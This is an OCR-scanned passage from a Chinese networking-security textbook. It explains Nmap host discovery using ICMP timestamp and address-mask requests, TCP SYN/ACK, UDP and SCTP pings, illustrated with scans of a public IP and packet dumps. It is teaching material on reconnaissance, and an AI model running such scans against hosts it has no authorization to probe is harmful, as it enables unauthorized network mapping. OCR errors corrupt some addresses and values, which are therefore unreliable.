Nmap done: 1 IP address (1 host up) scanned in 2.09 seconds 


此 时 发 送 的 数据 包 与 之 前 的 基本 相似 ， 只 是 Type 字段 的 值 换 成 了 13 (HERIK) o 


Frame 255: 54 bytes on wire (432 bits)，54 bytes captured (432 bits) on interface 0 
Ethernet II, Src: 08:10:76:6a:ad:30 (08:10:76:6a:ad:30), Dst: D-LinkIn b3:87:a9 
(d8:f£e:e3:b3:87:a9) 
Internet Protocol Version 4, Src: 192.168.0.4, Dst: 60.2.22.35 
Internet Control Message Protocol 
Type: 13 (Timestamp request 
Code: 0 
Checksum: 0x554c [correct] 
Identifier (BE): 40371 (0x9db3) 
Identifier (LE): 45981 (0xb39d) 
Sequence number (BE): 0 (0x0000 
Sequence number (LE): 0 (0x0000 
Originate timestamp: 0 (0 seconds after midnight UTC) 
Receive timestamp: 0 (0 seconds after midnight UTC) 
Transmit timestamp: 0 (0 seconds after midnight UTC 


目标 主机 在 获得 这 个 数据 包 之 后 ， 会 给 出 一 个 Type 字段 值 为 14 的 响应 数据 包 。 


Frame 258: 54 bytes on wire (432 bits), 54 bytes captured (432 bits) on interface 0 
Ethernet II, Src: D-LinkIn b3:87:a9 (d8:fe:e3:b3:87:a9), Dst: 08:10:76:6a:ad:30 
(08:10:76:6a:ad:30) 
Internet Protocol Version 4, Src: 60.2.22.35, Dst: 192.168.0.4 
Internet Control Message Protocol 
Type: 14 (Timestamp reply 
Code: 0 
Checksum: 0x9344 [correct] 
Identifier (BE): 40371 (0x9db3 
Identifier (LE): 45981 (0xb39d) 
Sequence number (BE): 0 (0x0000) 
Sequence number (LE): 0 (0x0000 
Originate timestamp: 0 (0 seconds after midnight UTC 
Receive timestamp: 79748035 (22 hours, 9 minutes, 8.035 seconds after midnight UTC) 
Transmit timestamp: 79748035 (22 hours, 9 minutes, 8.035 seconds after midnight UTC) 


利用 这 种 方式 就 可 以 检测 出 目标 设备 是 否 为 活跃 主机 。 


3. 通过 ICMP 地 址 掩 码 请 求 和 应 答 进行 主机 发 现 

使 用 Nmap 的 选项 -PM 可 以 实现 ICMP 协议 的 地 址 掩 码 主机 发 现 。 
命令 语法 : Nmap -PM[ 目标 ] 

执行 如 下 命令 。 

nmap -PM 211.81.200.8 


此 时 发 送 的 数据 包 与 之 前 的 基本 相似 ， 只 是 Type 字段 的 值 换 成 了 17 (地 址 掩 码 请 求 )。 
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Frame 4: 46 bytes on wire (368 bits)，46 bytes captured (368 bits) on interface 0 
Ethernet II, Src: 08:10:76:6a:ad:30 (08:10:76:6a:ad:30), Dst: D-LinkIn b3:87:a9 
(d8:fe:e3:b3:87:a9) 
Internet Protocol Version 4, Src: 192.168.0.4, Dst: 60.2.22.35 
Internet Control Message Protocol 
Type: 17 (Address mask request) 

Code: 0 

Checksum: 0x9f10 [correct] 

Identifier (BE): 20463 (0x4fef) 

Identifier (LE): 61263 (Oxef4f) 

Sequence number (BE): 0 (0x0000) 

Sequence number (LE): 0 (0x0000) 

Address Mask: 0.0.0.0 


虽然 这 个 协议 主要 使 用 在 无 盘 系 统 中 ， 但 是 也 有 一 些 系统 在 收 到 这 个 请 求 后 会 发 送 一 个 
应 答 。 需 要 注意 的 是 ， 这 种 方法 在 实际 中 很 少 使 用 。 

ICMP 协议 中 包含 了 很 多 种 方法 ， 但 是 这 些 基 于 ICMP 协议 的 扫描 方式 往往 也 是 安全 机 
制 防御 的 重点 ， 因 此 经 常 得 不 到 准确 的 结果 。 


2.5 基于 TCP 协议 的 活跃 主机 发 现 技术 


2.5.4 TCP 协议 解析 


TCP ( Transmission Control Protocol， 传 输 控 制 协议 ) 是 一 个 位 于 传输 层 的 协议 。 它 是 一 
种 面向 连接 的 、 可 靠 的 、 基 于 字 节 流 的 传输 层 通信 协议 ， 由 IETF 的 RFC 793 定义 。TCP 的 
特点 是 使 用 三 次 握手 协议 建立 连接 。 当 主动 方 发 出 SYN 连接 请 求 后 ， 等 待 对 方 回答 TCP 的 
三 次 握手 SYN+ACK， 并 最 终 对 对 方 的 SYN 执行 ACK 确认 。 这 种 建立 连接 的 方法 可 以 防止 
产生 错误 的 连接 ，TCP 使 用 的 流量 控制 协议 是 可 变 大 小 的 滑动 窗口 协议 。 

TCP 三 次 握手 的 过 程 如 下 : 

首先 ， 客 户 端 发 送 SYN (SEQ=x) 报 文 给 服务 器 端 ， 进 入 SYN SEND 状态 。 

其 次 ,服务 器 端 收 到 SYN 报 文 ， 回 应 一 个 SYN ( SEQ=y) ACK(ACK=x+1 ) RX, HA 
SYN RECV 状态 。 

最 后 ， 客 户 端 收 到 服务 器 端的 SYN 报 文 ， 回 应 一 个 ACK(ACK=y+1 ) RX, HA 
Established 状态 。 三 次 握手 完成 ，TCP 客户 端 和 服务 器 端 成 功 地 建立 连接 ， 可 以 开始 传输 
数据 。 

图 2-3 给 出 了 TCP 三 次 握手 的 过 程 。 

再 来 理解 一 下 “端口 ”的 概念 。 注 意 这 个 概念 在 前 面 介 绍 的 网 络 层 的 ARP 协议 和 ICMP 
协议 中 是 没有 的 。“ 端 口 ” 是 英文 port 的 意译 ， 可 以 认为 是 设备 与 外 界 通信 交流 的 出 口 。 端 
口 可 分 为 虚拟 端口 和 物理 端口 ， 这 里 使 用 的 就 是 虚拟 端口 ， 指 的 是 计算 机 内 部 或 交换 机 路 由 
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器 内 的 端口 ， 不 可 见 。 例 如 计算 机 中 的 80 端口 、21 端口 、23 端口 等 。 


SYN 


客户 端 服务 器 端 


图 2-3 TCP 三 次 握手 的 过 程 


如 果 将 每 一 台 主 机 比喻 成 一 栋 房子 ， 那 么 一 个 端口 就 可 以 理解 为 房子 的 一 鹿 门 ， 通 过 
这 扇 门 ， 人 们 就 可 以 进出 这 栋 房 子 。 当 然 有 一 点 不 同 的 是 ， 端 口 的 数目 可 以 多 达 65 536 个。 
要 这 么 多 端口 有 什么 用 呢 ? 我 们 知道 ， 一 台 拥 有 IP 地 址 的 主机 可 以 提供 许多 种 服务 ， 比 如 
Web 服务 、FTP 服务 、SMTP 服务 等 ， 这 些 服务 完全 可 以 通过 1 个 IP 地 址 来 实现 。 那 么 ， 主 
机 是 怎样 区 分 不 同 的 网 络 服务 呢 ? 显然 不 能 只 靠 下 地 址 ， 因 为 IP 地 址 与 网 络 服务 的 关系 是 
一 对 多 的 关系 。 实 际 上 是 通过 “IP 地 址 + 端口 号 ”来 区 分 不 同 服务 的 。 

通常 情况 下 ， 如 果 一 个 房子 的 门 是 开 着 的 ， 那 么 意味 着 房子 里 面 是 有 人 的 ， 同 样 道理 ， 
如 果 检 测 到 一 台 主机 的 某 个 端口 是 开放 的 ， 也 一 样 可 以 知道 这 台 主 机 是 活跃 主 机 。 

下 面 简单 介绍 一 下 端口 开放 的 扫描 概念 ， 详 细 的 内 容 将 在 第 3 章 中 进行 讲解 。 如 果 想 知 
道 主 机 B 是 否 处 于 活跃 状态 ， 就 可 以 向 主机 B 的 全 部 端口 (通常 并 不 这 样 做 ， 而 是 选择 一 部 
分 常用 的 端口 ) 发 送 连接 请 求 数据 包 ， 如 果 得 到 回应 (注意 只 要 收 到 了 数据 包 )， 就 可 以 认为 
主机 B 是 活跃 主机 。 














2.5.2 使 用 TCP 协议 进行 主机 发 现 


TE Nmap 中 常用 的 TCP 协议 扫描 方式 有 两 种 ， 分 别 是 TCP SYN 扫描 和 TCP ACK 扫描 ， 
这 两 种 扫描 方式 其 实 都 是 利用 TCP 的 三 次 握手 实现 的 。 


1. TCP SYN 扫描 

Nmap 中 使 用 -PS 选项 来 向 目标 主机 发 送 一 个 设置 了 SYN 标志 的 数据 包 ， 这 个 数据 包 的 
内 容 部 分 为 空 。 通 常 默认 的 目标 端口 是 80 端口 ， 也 可 以 使 用 参数 来 改变 目标 端口 。 例 如 将 
目标 端口 改变 为 22、23、113、35000 等 ， 当 指定 多 个 端口 时 ，Nmap 将 会 并 发 地 对 这 些 端口 
进行 测试 。 

目标 主机 在 收 到 Nmap 所 发 送 的 SYN 数据 包 之 后 ， 会 认为 Nmap 所 在 主机 想 要 和 自己 
的 一 个 端口 建立 连接 ， 如 果 这 个 端口 是 开放 的 ， 目 标 主机 就 会 按照 TCP 三 次 握手 的 规定 ,发 
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回 一 个 SYN/ACK 数据 包 ， 表 示 同 意 建立 连接 。 如 果 这 个 端口 是 关闭 的 ， 目 标 主机 就 会 拒绝 
这 次 连接 ， 向 Nmap 所 在 主机 发 送 一 个 RST 数据 包 。 图 2-4 给 出 SYN 扫描 的 过 程 。 








SYN 


客户 端 服务 器 端 


RST 


图 2-4 SYN 扫描 过 程 


不 过 ， 在 这 个 阶段 我 们 并 不 在 乎 目标 主机 的 目标 端口 是 否 开放 ， 只 在 乎 目标 主机 是 否 活 
跃 。 在 发 出 SYN 数据 包 之 后 ， 只 要 收 到 数据 包 ， 无 论 是 SYN/ACK 数据 包 还 是 RST 数据 包 ， 
都 意味 着 目标 主机 是 活路 的 。 如 果 没 有 收 到 任何 数据 包 ， 就 意味 着 目标 主机 不 在 线 。 

在 Nmap 中 可 以 使 用 -PS 参数 来 实现 这 种 扫描 。 

命令 语法 : Nmap -PS[ 端口 1， 端 口 2，…… ] [目标 ] 

下 面 给 出 一 个 Nmap 扫描 60.2.22.35 的 实例 。 

Nmap -sn -PS 60.2.22.35 


扫描 结果 如 下 。 


Starting Nmap 7.12 ( https://Nmap.org ) at 2016-09-16 11:12 
Nmap scan report for 60.2.22.35 

Host is up (0.021s latency). 

Nmap done: 1 IP address (1 host up) scanned in 1.88 seconds 


整个 扫描 过 程 中 产生 的 数据 包 如 图 2-5 所 示 。 


Source Destination Protocol Length Info 
192.168.0.5 60.2.22.35 TCP 58 48222 > 80 [SYN] Seq-0 Win-1024 Len=@ MSS-1460 mann 
TCP 58 80 + 48222 [SYN, ACK] Seq-0 Ack-1 Win-17520 Len-0 MSS-1452 


80 [RST] Seq=1 Win-=0 Len=0 













图 2-5 ”一 次 SYN 扫描 过 程 产 生 的 数据 包 


首先 是 Nmap 所 在 的 主机 192.168.0.5 向 60.2.22.35 发 送 了 一 个 SYN 数据 包 。 


Frame 57: 58 bytes on wire (464 bits)，58 bytes captured (464 bits) on interface 0 
Ethernet II, Src: 08:10:76:6a:ad:30 (08:10:76:6a:ad:30), Dst: D-LinkIn b3:87:a9 
(d8:fe:e3:b3:87:a9) 

Internet Protocol Version 4, Src: 192.168.0.5, Dst: 60.2.22.35 

Transmission Control Protocol, Src Port: 48222 (48222), Dst Port: 80 (80), 

Seq: 0, Len: 0 

Source Port: 48222 

Destination Port: 80 (0) 
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[Stream index: 2] 

[TCP Segment Len: 0] 

Sequence number: 0 (relative sequence number) 
Acknowledgment number: 0 

Header Length: 24 bytes 
Flags: 0x002 (SYN) Qo 
Window size value: 1024 

[Calculated window size: 1024] 

Checksum: 0x5bbl [validation disabled] 

Urgent pointer: 0 

Options: (4 bytes), Maximum segment size 


@ 表 示 连 接 的 目标 端口 为 80。 

@) 表 示 这 是 一 个 SYN 类 型 数据 包 。 

如 果 目 标 60.2.22.35 是 活跃 主机 ， 而 且 80 端口 是 开放 的 ， 那 么 按照 TCP 协议 的 规定 ， 
就 会 给 192.168.0.5 发 送 一 个 应 答 ， 这 个 应 答 是 SYN/ACK 数据 包 。 


Frame 58: 58 bytes on wire (464 bits)，58 bytes captured (464 bits) on interface 0 
Ethernet II, Src: D-LinkIn b3:87:a9 (d8:fe:e3:b3:87:a9), Dst: 08:10:76:6a:ad:30 
(08:10:76:6a:ad:30) 
Internet Protocol Version 4, Src: 60.2.22.35, Dst: 192.168.0.5 
Transmission Control Protocol, Src Port: 80 (80), Dst Port: 48222 (48222), Seq: 
0, Ack: 1, Len: 0 
Source Port: 80 
Destination Port: 48222 © 
[Stream index: 2] 
[TCP Segment Len: 0] 


Sequence number: 0 (relative sequence number 
Acknowledgment number: 1 (relative ack number 
Header Length: 24 bytes 
Flags: 0x012 (SYN, ACK) Q 


Window size value: 17520 

[Calculated window size: 17520] 
Checksum: 0xcc97 [validation disabled] 
Urgent pointer: 0 

Options: (4 bytes), Maximum segment size 
[SEQ/ACK analysis] 


Nmap 所 在 主机 在 收 到 这 个 数据 包 之 后 ， 并 不 会 真 的 和 目标 主机 建立 连接 ， 因 为 目的 只 
是 判断 目标 主机 是 否 为 活跃 主机 ， 因 此 需要 结束 这 次 连接 ，TCP 协议 中 结束 连接 的 方法 就 是 
向 目标 发 送 一 个 RST 数据 包 。 


Frame 59: 54 bytes on wire (432 bits), 54 bytes captured (432 bits) on interface 0 
Ethernet II, Src: 08:10:76:6a:ad:30 (08:10:76:6a:ad:30), Dst: D-LinkIn b3:87:a9 
(d8:fe:e3:b3:87:a9) 
Internet Protocol Version 4, Src: 192.168.0.5, Dst: 60.2.22.35 
Transmission Control Protocol, Src Port: 48222 (48222), Dst Port: 80 (80), Seq: 
1, Len: 0 

Source Port: 48222 
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Destination Port: 80 0 
[Stream index: 2] 
[TCP Segment Len: 0] 
Sequence number: 1 (relative sequence number) 
Acknowledgment number: 4155732289 
Header Length: 20 bytes 
Flags:0x004 (RST) Q 
Window size value: 0 
[Calculated window size: 0] 
[Window size scaling factor: -2 (no window scaling used)] 
Checksum: 0x0e75 [validation disabled] 
Urgent pointer: 0 


中 表示 这 个 数据 包 的 目标 仍然 是 60.2.22.35 的 SO 端口 ， 但 是 数据 包 的 格式 不 再 是 TCP 
三 次 握手 中 的 ACK 确认 数据 包 ， 而 是 要 断 开 连 接 的 RST 数据 包 ， 这 是 因为 目的 已 经 达到 ， 
此 时 已 经 知道 目标 主机 是 活跃 主机 ， 无 须 和 目标 主机 完成 连接 的 建立 。 

下 面 给 出 一 个 目标 端口 不 开放 的 例子 。 这 里 指定 连接 的 端口 为 目标 的 10000 端口 ， 命 令 
如 下 。 


Nmap -sn -PS 10000 60.2.22.35 


扫描 的 结果 如 下 。 


Starting Nmap 7.12 ( https://Nmap.org ) at 2016-09-16 11:34 
Nmap scan report for 60.2.22.35 

Host is up (0.022s latency). 

Nmap done: 1 IP address (1 host up) scanned in 1.86 seconds 


Nmap 所 产生 的 数据 包 格式 如 下 。 


Frame 3742: 58 bytes on wire (464 bits), 58 bytes captured (464 bits) on interface 0 
Ethernet II, Src: 08:10:76:6a:ad:30 (08:10:76:6a:ad:30), Dst: D-LinkIn b3:87:a9 
(d8:fe:e3:b3:87:a9) 
Internet Protocol Version 4, Src: 192.168.0.5, Dst: 60.2.22.35 
Transmission Control Protocol, Src Port: 56532 (56532), Dst Port: 10000 (10000), 
Seq: 0, Len: 0 
Source Port: 56532 
Destination Port: 10000 
[Stream index: 105] 
[TCP Segment Len: 0] 
Sequence number: 0 (relative sequence number 
Acknowledgment number: 0 
Header Length: 24 bytes 
Flags: 0x002 (SYN) 
Window size value: 1024 
[Calculated window size: 1024] 
Checksum: 0xac68 [validation disabled] 
Urgent pointer: 0 
Options: (4 bytes), Maximum segment size 
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60.222.35 收 到 了 这 个 SYN 数据 包 ，, 但 是 它 的 10000 端口 并 没有 开放 ， 因 此 它 会 向 
Nmap 所 在 的 主机 发 回 一 个 应 答 ， 表 示 该 端口 是 关闭 的 ， 这 个 数据 包 同 样 也 是 RST 格式 的 。 


Frame 3743: 54 bytes on wire (432 bits), 54 bytes captured (432 bits) on interface 0 
Ethernet II, Src: D-LinkIn b3:87:a9 (d8:fe:e3:b3:87:a9), Dst: 08:10:76:6a:ad:30 
(08:10:76:6a:ad:30) 
Internet Protocol Version 4, Src: 60.2.22.35, Dst: 192.168.0.5 
Transmission Control Protocol, Src Port: 10000 (10000), Dst Port: 56532 (56532), 
Seq: 1, Ack: 1, Len: 0 
Source Port: 10000 

Destination Port: 56532 

[Stream index: 105] 

[TCP Segment Len: 0] 

Sequence number: 1 (relative sequence number) 

Acknowledgment number: 1 (relative ack number) 

Header Length: 20 bytes 
Flags: 0x014 (RST, ACK) 

Window size value: 0 

[Calculated window size: 0] 

[Window size scaling factor: -2 (no window scaling used)] 

Checksum: 0xc811 [validation disabled] 

Urgent pointer: 0 

[SEQ/ACK analysis] 


Nmap 收 到 目标 主机 发 回 的 应 答 ， 也 同样 可 以 判断 目标 主机 是 活跃 主机 ， 也 就 是 说 只 要 
收 到 目标 主机 的 应 答 ， 就 可 以 认为 目标 主机 是 活跃 主机 ， 而 无 须 理会 应 答 的 具体 内 容 。 

TCP 扫描 是 Nmap 扫描 技术 中 最 强大 的 技术 之 一 ， 很 多 服务 器 的 防御 机 制 都 会 屏蔽 掉 
ICMP echo 请 求 数据 包 ， 但 是 任何 的 服务 器 都 会 响应 针对 其 服务 的 SYN 数据 包 。 例 如 ， 一 个 
Web 服务 器 的 安全 机 制 不 可 能 拒绝 发 往 80 端口 的 SYN 数据 包 ， 虽 然 有 可 能 会 拒绝 ACK 数 
据 包 。 但 是 要 注意 的 是 ， 很 多 服务 器 的 安全 机 制 可 能 会 屏蔽 掉 它 提供 服务 以 外 的 端口 ， 比 如 
Web 服务 器 的 安全 机 制 就 可 能 将 除 80 端口 以 外 的 所 有 端口 都 屏蔽 掉 ， 因 此 当 你 将 一 个 SYN 
数据 包 发 往 它 的 22 端口 时 ， 就 可 能 会 石沉大海 一 样 ， 没 有 任何 的 应 答 ， 得 不 到 任何 有 用 的 
信息 。 而 我 们 又 很 难 对 大 量 主机 的 所 有 端口 进行 扫描 ， 因 此 在 对 目标 进行 扫描 时 ， 端 口 的 选 
择 就 显得 很 重要 。 表 2-2 列 出 了 TCP 扫描 中 最 为 常用 的 14 个 端口 。 

表 2-2 常见 的 TCP 扫描 端口 




















端口 号 提供 的 服务 
80 http 

25 smtp 

22 ssh 

443 https 

21 ftp 

113 auth 
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(E) 
端口 号 提供 的 服务 
23 telnet 
53 domain 
554 rtsp 
3389 ms-term-server 
1723 pptp 
389 ldap 
636 ldapssl 
256 fwl-securemote 


在 利用 端口 扫描 的 时 ， 也 可 以 使 用 这 些 端口 的 组 合 ， 比 如 “ -PS 22, 80” 就 是 一 个 不 错 
的 选择 ， 但 是 也 要 注意 “-PS 80, 443” 的 意义 就 不 大 ， 因 为 这 两 个 端口 对 应 的 分 别 是 http、 
https 服务 ， 如 果 目 标 是 一 个 Web 服务 器 ， 它 基本 上 总 是 会 提供 这 两 个 服务 ， 如 果 不 是 ， 那 
么 它 一 个 服务 都 不 会 提供 。 因 此 ,“-PS 80, 443” 这 个 组 合 很 有 可 能 是 重复 的 。 


2. TCP ACK 扫描 

再 看 另 一 种 类 型 的 TCP 协议 扫描 ， 这 种 扫描 被 称 作 ACK 扫描 。 实 际 上 它 和 SYN 扫描 
相当 相似 ， 不 同 之 处 只 在 于 Nmap 发 送 的 数据 包 中 使 用 TCP/ACK 标志 位 ， 而 不 是 SYN 标志 
位 。 按 照 TCP 三 次 握手 的 规则 ， 两 台 主 机 A 和 B， 只 有 当 A 向 B AE T SYN 数据 包 之 后 ， 
B 才 会 回应 A 一 个 TCP/ACK 数据 包 。 

现在 Nmap 直接 向 目标 主机 发 送 一 个 TCP/ACK 数据 包 ， 目 标 主机 显然 无 法 清楚 这 是 怎 
么 回 事 ， 当 然 也 不 可 能 成 功 建立 TCP 连接 ， 因 此 只 能 向 Nmap 所 在 主机 发 送 一 个 RST 标志 
位 的 数据 包 ， 表 示 无 法 建立 这 个 TCP 连接 ， 图 2-6 给 出 了 这 样 的 一 次 扫描 过 程 。 








客户 端 服务 器 端 


图 2-6 ACK 扫描 过 程 


这 种 ACK 扫描 的 方式 同样 以 80 端口 作为 默认 端口 ， 也 可 以 进行 指定 。 如 果 需 要 对 目标 
主机 采用 这 种 扫描 方式 ， 可 以 使 用 如 下 命令 。 


Nmap -sn -PA 60.2.22.35 
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扫描 的 结果 如 下 。 


Starting Nmap 7.12 ( https://Nmap.org ) at 2016-09-16 12:07 
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn 
Nmap done: 1 IP address (0 hosts up) scanned in 3.88 seconds 


不 过 这 次 扫描 显然 失败 了 。 在 实际 情况 中 ， 这 种 类 型 的 扫描 很 少 能 成 功 ， 造 成 这 种 情况 
的 原因 是 目标 主机 上 的 安全 机 制 或 者 安全 设备 将 这 种 莫名 其 妙 的 TCP/ACK 包 直接 过 滤 掉 了 。 
不 过 还 是 可 以 查看 一 下 这 个 数据 包 的 格式 。 


Frame 15315: 54 bytes on wire (432 bits), 54 bytes captured (432 bits) on interface 0 
Ethernet II, Src: 08:10:76:6a:ad:30 (08:10:76:6a:ad:30), Dst: D-LinkIn b3:87:a9 
(d8:fe:e3:b3:87:a9) 
Internet Protocol Version 4, Src: 192.168.0.5, Dst: 60.2.22.35 
Transmission Control Protocol, Src Port: 51269 (51269), Dst Port: 80 (80), 
Seq: 1, Ack: 1, Len: 0 
Source Port: 51269 
Destination Port: 80 
[Stream index: 226] 
[TCP Segment Len: 0] 
Sequence number: 1 (relative sequence number) 
Acknowledgment number: 1 (relative ack number) 
Header Length: 20 bytes 
Flags: 0x010 (ACK) 
Window size value: 1024 
[Calculated window size: 1024] 
[Window size scaling factor: -1 (unknown)] 
Checksum: 0xa0e8 [validation disabled] 
Urgent pointer: 0 


在 Nmap 发 出 数据 包 之 后 ， 并 没有 收 到 任何 应 答 ， 这 时 存在 两 种 可 能 ， 一 种 是 这 个 数据 
包 被 对 方 的 安全 机 制 过 滤 掉 了 ， 因 为 目标 根本 没有 收 到 这 个 数据 包 ， 另 一 种 就 是 目标 主机 并 
非 活跃 主机 。Nmap 通常 会 按照 第 二 种 情况 进行 判断 ， 也 就 是 给 出 一 个 错误 的 结论 : 目标 并 
非 活跃 主机 。 


2.6 基于 UDP 协议 的 活跃 主机 发 现 技术 


2.6.1 UDP 协议 解析 

UDP 协议 也 是 一 个 位 于 传输 层 的 协议 。 它 完成 的 工作 与 TCP 是 相同 的 ,但 是 由 于 
UDP 协议 是 非 面向 连接 的 ， 对 UDP 端口 的 探测 也 就 不 可 能 像 TCP 端口 的 探测 那样 依赖 
连接 建立 过 程 (不 能 使 用 telnet 这 种 TCP 协议 类 型 命令 )， 这 也 使 得 UDP 端口 扫描 的 可 靠 性 
不 高 。 因 此 ， 虽 然 UDP 协议 较 之 TCP 协议 显得 简单 ， 但 是 对 UDP 端口 的 扫描 却 是 相当 困 
难 的 。 


n 
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当 一 个 UDP 端口 收 到 一 个 UDP 数据 包 时 ， 如 果 它 是 关闭 的 ， 就 会 给 源 端 发 回 一 个 


ICMP 端口 不 可 达 数 据 包 ; 如 果 它 是 开放 的 ， 就 会 忽略 这 个 数据 包 ， 也 就 是 将 它 丢弃 而 不 返 





加 





任何 信息 。 











这 样 做 的 优点 就 是 可 以 完成 对 UDP 端口 的 探测 ， 而 缺点 为 扫描 结果 的 可 靠 性 比较 低 。 





为 当 发 出 一 个 UDP 数据 包 而 没有 收 到 任何 的 应 答 时 ， 有 可 能 因为 这 个 UDP 端口 是 开放 
的 ， 也 有 可 能 是 因为 这 个 数据 包 在 传输 过 程 中 丢失 了 。 另 外 ， 扫 描 的 速度 很 慢 。 原 因 是 在 














RFC1812 中 对 ICMP 错误 报 文 的 生成 速度 做 出 了 限制 。 例 如 Linux 就 将 ICMP 报 文 的 生成 速 
度 限制 为 每 4 秒 产 生 80 个 ， 当 超出 这 个 限制 的 时 候 ， 还 要 暂停 1/4 秒 。 


2.6.2 ”使 用 UDP 协议 进行 主机 发 现 


使 用 Nmap 的 选项 -PU 就 可 以 实现 UDP 协议 的 主机 发 现 。 

命令 语法 : Nmap -PU[ 目标 ] 

使 用 这 种 方式 对 60.2.22.35 进行 一 次 使 用 UDP 协议 的 扫描 行动 。 
Nmap -sn -PU 60.2.22.35 


扫描 的 结果 如 下 。 


Starting Nmap 7.12 ( https://Nmap.org ) at 2016-09-16 12:45 
Nmap scan report for 60.2.22.35 

Host is up (0.020s latency). 

Nmap done: 1 IP address (1 host up) scanned in 1.83 seconds 


在 这 种 扫描 方式 中 ，Nmap 向 60.2.22.35 发 送 了 一 个 UDP 类 型 的 数据 包 ， 这 个 数据 包 的 


格式 如 下 。 


Frame 3105: 42 bytes on wire (336 bits), 42 bytes captured (336 bits) on interface 0 
Ethernet II, Src: 08:10:76:6a:ad:30 (08:10:76:6a:ad:30), Dst: D-LinkIn b3:87: 
a9 (d8:fe:e3:b3:87:a9) 
Internet Protocol Version 4, Src: 192.168.0.4, Dst: 60.2.22.35 
User Datagram Protocol, Src Port: 49497 (49497), 
Dst Port: 40125 (40125) o 
Source Port: 49497 
Destination Port: 40125 
Length: 8 
Checksum: 0x8ef5 [validation disabled] 
[Stream index: 32] 


@D 表 示 发 送 的 数据 包 使 用 的 协议 为 UDP， 目标 端口 为 40125。 在 目标 收 到 这 个 数据 


包 之 后 ， 由 于 40125 端口 是 关闭 的 ， 就 会 向 Nmap 所 在 主机 发 送 一 个 ICMP 端口 不 可 达 数 


据 包 。 


Frame 3115: 70 bytes on wire (560 bits)，70 bytes captured (560 bits) on interface 0 
Ethernet II, Src: D-LinkIn b3:87:a9 (d8:fe:e3:b3:87:a9), Dst: 08:10:76:6a:ad:30 
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(08:10:76:6a:ad:30) 
Internet Protocol Version 4, Src: 60.2.22.35, Dst: 192.168.0.4 
Internet Control Message Protocol 
Type: 3 (Destination unreachable) 
Code: 3 (Port unreachable) 
Checksum: 0x0fe8 [correct] 
Unused: 00000000 
Internet Protocol Version 4, Src: 192.168.0.4, Dst: 60.2.22.35 
User Datagram Protocol, Src Port: 49497 (49497), Dst Port: 40125 (40125) 
Source Port: 49497 
Destination Port: 40125 
Length: 8 
Checksum: 0x8ef5 [validation disabled] 
[Stream index: 32] 


Nmap 收 到 这 个 数据 包 之 后 ， 就 可 以 判断 目标 主机 为 活跃 主机 了 。 针 对 UDP 的 扫描 成 
功 ， 端 口 的 选择 也 很 重要 ， 但 是 与 TCP 不 同 ，TCP 需要 扫描 目标 主机 开放 的 端口 ， 而 UDP 
需要 扫描 的 是 目标 主机 关闭 的 端口 。 在 扫描 的 过 程 中 ,需要 避 开 那些 常用 的 UDP 协议 端口 ， 
例如 DNS (端口 53 )、SNMP ( 161 )。 因 此 在 扫描 的 时 候 ， 最 合适 的 做 法 就 是 选择 一 个 值 比 
较 大 的 端口 ， 例 如 35462. 


2.7 基于 SCTP 协议 的 活跃 主机 发 现 技术 


2.71 SCTP 协议 解析 

SCTP 与 TCP 同属 于 传输 层 上 的 协议 ， 这 一 层 的 协议 数量 比较 少 。 其 实 SCTP 协议 与 
TCP 完成 的 任务 是 相同 的 。 但 两 者 之 间 却 存在 着 很 大 的 不 同 之 处 。 

首先 ，TCP 协议 一 般 是 用 于 单 地 址 连接 的 ， 而 SCTP 却 可 以 用 于 多 地 址 连接 。 

其 次 ，TCP 协议 是 基于 字 节 流 的 ，SCTP 是 基于 消息 流 的 。TCP 只 能 支持 一 个 流 ， 而 
SCTP 连接 (association) 同时 可 以 支持 多 个 流 (stream) 。 

最 后 ，TCP 连接 的 建立 是 通过 三 次 握手 实现 的 ， 而 SCTP 是 通过 一 种 4 次 握手 的 机 制 实 
现 的 ， 这 种 机 制 可 以 有 效 避 免 攻击 的 产生 。 在 SCTP 中 ， 客 户 端 使 用 一 个 INIT 报 文 发 起 一 个 
连接 ， 服 务 器 端 使 用 一 个 INIT-ACK 报 文 进行 应 答 ， 其 中 就 包括 了 cookie (标识 这 个 连接 的 
唯一 上 下 文 )。 然 后 客户 端 使 用 一 个 COOKIE-ECHO 报 文 进 行 响应 ， 其 中 包含 了 服务 器 端 所 
发 送 的 cookie。 服 务 器 端 要 为 这 个 连接 分 配 资源 ， 并 通过 向 客户 端 发 送 一 个 COOKIE-ACK 
报 文 对 其 进行 响应 。 











2.7.2 使 用 SCTP 协议 进行 主机 发 现 
使 用 Nmap 的 选项 -PY 就 可 以 向 目标 主机 发 送 一 个 SCTP INIT 数据 包 。 
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命令 语法 : Nmap -PY[ 端口 1, 端口 2……] [目标 ] 
例如 对 目标 60.2.22.35 进行 一 次 SCTP 协议 类 型 的 扫描 。 
Nmap -sn -PY 60.2.22.35 


扫描 的 结果 如 下 。 


Starting Nmap 7.12 ( https://Nmap.org ) at 2016-09-16 12:58 
Note: Host seems down. If it is really up, but blocking our ping probes, 
Nmap done: 1 IP address (0 hosts up) scanned in 3.76 seconds 


try -Pn 


扫描 结果 为 该 主机 并 不 是 活跃 主机 ， 这 个 结果 是 不 正确 的 ， 主 要 原因 是 目标 主机 并 不 支 
持 SCTP 协议 。 目 前 支持 这 个 协议 的 主机 并 不 多 ， 因 此 这 种 方法 只 能 作为 一 种 备用 手段 。 





Nmap 进行 这 种 扫描 所 发 出 的 数据 包 的 格式 如 下 。 


Frame 44314: 66 bytes on wire (528 bits)，66 bytes captured (528 bits) on interface 0 
Ethernet II, Src: 08:10:76:6a:ad:30 (08:10:76:6a:ad:30), Dst: D-LinkIn b3:87:a9 


(d8:fe:e3:b3:87:a9) 
Internet Protocol Version 4, Src: 192.168.0.5, Dst: 60.2.22.35 
Stream Control Transmission Protocol, Src Port: 49996 (49996), Dst Port: 
Source port: 49996 
Destination port: 80 
Verification tag: 0x00000000 
[Assocation index: 0] 
Checksum: 0xe88acldd (not verified) 
INIT chunk (Outbound streams: 10, inbound streams: 2048 
Chunk type: INIT (1) 
Chunk flags: 0x00 
Chunk length: 20 
Initiate tag: Oxba3d34ac 
Advertised receiver window credit (a rwnd): 32768 
Number of outbound streams: 10 
Number of inbound streams: 2048 
Initial TSN: 2624285906 


2.8 BE IP 协议 进行 主机 地 址 发 现 


80 (80) 


JP 协议 是 TCP/IP 协议 族 中 的 核心 协议 ， 也 是 TCP/IP 的 载体 。 所 有 的 TCP、UDP、 


ICMP 及 IGMP 数据 都 以 IP 数据 包 格 式 传输 。IP 数据 包 的 格式 如 图 2-7 所 示 。 





